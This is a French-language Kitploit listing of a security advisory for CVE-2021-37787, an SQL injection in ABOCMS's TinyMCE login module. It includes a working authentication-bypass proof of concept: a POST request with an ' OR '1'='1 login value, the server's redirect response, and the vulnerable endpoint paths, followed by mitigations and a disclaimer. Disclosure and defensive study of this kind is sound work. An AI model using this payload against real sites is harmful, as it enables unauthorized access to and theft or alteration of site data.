Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-37787 — CVE-2021-37787 | Kitploit
Outils/GitHubGitHub/vasykor/cve-2021-37787
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubvasykor/cve-2021-37787

CVE-2021-37787

CVE-2021-37787

Voir le dépôt
19il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-37787 : Injection SQL dans ABOCMS via le module TinyMCE

Détails de la vulnérabilité

  • Identifiant CVE : CVE-2021-37787
  • Produit : ABOCMS
  • Version(s) concernée(s) : 5.8.x, ≤5.9.3
  • Type de vulnérabilité : Injection SQL
  • Score CVSS : 9.8

Description

Une vulnérabilité critique d'injection SQL existe dans ABOCMS au sein du module TinyMCE. La vulnérabilité provient d'une désinfection insuffisante des entrées dans l'interaction du module TinyMCE avec la base de données, permettant à un attaquant d'injecter des requêtes SQL malveillantes. Cela peut conduire à un accès non autorisé aux données, à leur modification, voire à une compromission totale de la base de données sous-jacente.

Le point de terminaison vulnérable se situe dans le traitement par le module TinyMCE des entrées fournies par l'utilisateur. Un attaquant peut exploiter cette faille pour exécuter des commandes SQL arbitraires.

Impact

  • Contournement de l'authentification.
  • Extraction de données sensibles.
  • Modification ou suppression d'enregistrements de la base de données.
  • Exécution de code à distance potentielle, selon la configuration de la base de données.

Preuve de concept (PoC)

Requête POST

POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded

return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

Réponse

HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

Point de terminaison vulnérable

La vulnérabilité peut être déclenchée via le point de terminaison suivant :

/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php

Atténuation

  • Pour les utilisateurs :

    • Mettez à niveau vers la dernière version d'ABOCMS.
    • Désactivez le module TinyMCE s'il n'est pas essentiel.
  • Pour les développeurs :

    • Utilisez des requêtes préparées (prepared statements) ou des requêtes paramétrées pour interagir avec la base de données.
    • Mettez à jour le module TinyMCE vers la dernière version sécurisée.
    • Mettez en place une validation appropriée des entrées afin de filtrer les charges utiles malveillantes.

Avertissement

Cette preuve de concept est fournie à des fins éducatives et de recherche en sécurité uniquement. N'utilisez pas ce code pour nuire à des systèmes ou des réseaux sans autorisation explicite du propriétaire. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cette preuve de concept.

Télécharger l’outil